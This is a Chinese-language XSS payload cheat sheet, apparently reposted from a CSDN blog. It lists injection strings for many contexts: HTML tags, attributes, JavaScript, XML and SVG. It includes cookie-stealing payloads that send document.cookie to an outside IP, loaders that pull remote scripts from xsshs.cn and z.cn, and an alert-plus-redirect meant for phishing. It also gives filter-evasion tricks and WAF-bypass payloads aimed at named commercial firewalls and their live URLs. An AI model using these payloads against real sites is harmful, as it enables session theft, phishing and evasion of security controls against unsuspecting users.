不一樣的xss payload
VSole2022-08-28 06:50:01
不同的情況不一樣的xss payload:
彈窗
<script>alert(1)</script> <script>prompt(2)</script> <script>confirm(3)</script> <script>console.log(3)</script> <script>document.write(1)</script>
當不能彈窗的時候,可以用下面的payload來證明
<script>console.log(3)</script> <script>document.write(1)</script>
引入外部js,可能需要短域名
<script src=//xsshs.cn></script>
<img src onerror=appendChild(createElement("script")).src="http://xsshs.cn/aaaa">
<img src onerror=jQuery.getScript("http://xsshs.cn/aaaa")>
盜取cookie
<script>window.location.+escape(document.cookie)</script>
<script>document.body.appendChild(document.createElement("img")).src="http://2.2.2.2/?msg="+escape(document.cookie)</script>
結合彈窗和url跳轉進行釣魚
<script>alert("您的flash版本過低,請更新您的flash版本"); window.location.</script>
當xss的觸發位置在標簽外
name=<script>alert(1)</script>
標簽內
name="><script>alert(1)</script> name=1" id=javascript:alert(1) autofocus onfocus=location=this.id xx="
在href=中
name=javascript:alert(1)
在js中
name=</script><script>alert(1)</script>
name=';alert(1)//
name='-alert(1)-'
name=';};alert(1);function a(){a='
在xml中
<?xml version="1.0"?><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(/XSS/)'></a> <?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>alert(1);</html:script></html:html>
svg
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="100px" height="100px" viewBox="0 0 751 751" enable-background="new 0 0 751 751" xml:space="preserve"> <image id="image0" width="751" height="751" x="0" y="0"
href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAu8AAALvCAIAAABa4bwGAAAAIGNIUk0AAHomAACAhAAA+gAAAIDo" />
<script>alert(1)</script>
</svg>
當過濾了圓括號
<script>alert`1`</script> <video src onerror=a="%2",location="javascript:aler"+"t"+a+"81"+a+"9"> <video src onerror="javascript:window.onerror=alert;throw 1">
當過濾了空格
假設payload如下:
html><imgAAsrcAAonerrorBB=BBalertCC(1)DD</html>
A位置可填充/,/123/,%09,%0A,%0C,%0D,%20
B位置可填充%09,%0A,%0C,%0D,%20
C位置可填充%0B,如果加雙引號,則可以填充/**/,%09,%0A ,%0C,%0D,%20
D位置可填充%09,%0A,%0C,%0D,%20,//,>
函數配合拼接
<video/src/onerror=top.alert(1);>
<video/src/onerror=top[`al`+`ert`](1);>
<video/src/onerror=self[`al`+`ert`](1);>
<video/src/onerror=parent[`al`+`ert`](1);>
<video/src/onerror=window[`al`+`ert`](1);>
<video/src/onerror=frames[`al`+`ert`](1);>
<video/src/onerror=content[`al`+`ert`](1);>
<body/onload=eval(alert(1));>
<body/onload=eval(`al`+`ert(1)`);>
<body/onload=open(alert(1));>
<body/onload=document.write(alert(1));>
<body/onload=setTimeout(alert(1));>
<body/onload=setInterval(alert(1));>
<body/onload=Set.constructor(alert(1))()>
<body/onload=Map.constructor(alert(1))()>
<body/onload=Array.constructor(alert(1))()>
<body/onload=WeakSet.constructor(alert(1))()>
<body/onload=constructor.constructor(alert(1))>
<video/src/onerror=[1].map(alert);>
<video/src/onerror=[1].map(eval('al'+'ert'));>
<video/src/onerror=[1].find(alert);>
<video/src/onerror=[1].every(alert);>
<video/src/onerror=[1].filter(alert);>
<video/src/onerror=[1].forEach(alert);>
<video/src/onerror=[1].findIndex(alert);>
賦值和拼接
<img src onerror=_=alert,_(1)>
<img src alt=al lang=ert onerror=top[alt+lang](1)>
<img src onerror=top[a='al',b='ev',b+a]('alert(1)')>
<img src onerror=['ale'+'rt'].map(top['ev'+'al'])[0]['valu'+'eOf']()(1)>
創建匿名函數
<video/src/onerror=Function('ale'+'rt(1)')();>
偽協議
<svg/onload=javascript:alert(1)> <iframe src=javascript:alert(1)> <form action=javascript:alert(1)><input type=submit> <a href=javascript:alert(123);>xss</a> <iframe src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=> <object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=></object> <embed src=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+> <embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==">
安全狗
http://www.safedog.cn/index/privateSolutionIndex.html?tab=2<video/src/onerror=top[`al`%2B`ert`](1);>
http://www.safedog.cn/index/privateSolutionIndex.html?tab=2<video/src/onerror=appendChild(createElement("script")).src="http://z.cn">
D盾
http://www.d99net.net/News.asp?id=126<video/src/onloadstart=top[`al`%2B`ert`](1);> http://www.d99net.net/News.asp?id=126<video/src/onloadstart=top[a='al',b='ev',b%2ba](appendChild(createElement(`script`)).src=`//z.cn`);>
云鎖+奇安信waf
http://www.yunsuo.com.cn/ht/dynamic/20190903/259.html?id=1<video/src/onloadstart=top[`al`%2B`ert`](1);> http://www.yunsuo.com.cn/ht/dynamic/20190903/259.html?id=1<video/src/onloadstart=top[a='al',b='ev',b%2ba](appendChild(createElement(`script`)).src=`//z.cn`);>
一些新奇的xss playload
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<input onfocus=alert(1) autofocus>
<h1 onmousemove="alert(1)">title</h1>
<select onfocus=alert(1) autofocus>
<iframe src="vbscript:msgbox(1)"></iframe>
<iframe src="javascript:alert(1)"></iframe>
<iframe src="vbscript:msgbox(1)"></iframe>
<iframe onload=alert(1)></iframe>
<iframe src="data:text/html,<script>alert(0)</script>"></iframe>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>
</iframe><iframe src="vbscript:msgbox(1)"></iframe>
</iframe><iframe src="data:text/html,<script>alert(0)</script>"></iframe>
<details open ontoggle=prompt(/xss/)>
<plaintext/onmouseover=prompt(1)>
javascript://comment%250aalert(1)
<img src=x onerror=confirm(1)>
<video><source onerror=alert(1)>
<audio src=x onerror="alert(1)">
<body onload=alert(1)>
<body onscroll=alert(1);><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<textarea onfocus=alert(1) autofocus>
版權聲明:本文為CSDN博主「Redmaple925」的原創文章。原文鏈接:https://blog.csdn.net/songbai220/article/details/120667388
VSole
網絡安全專家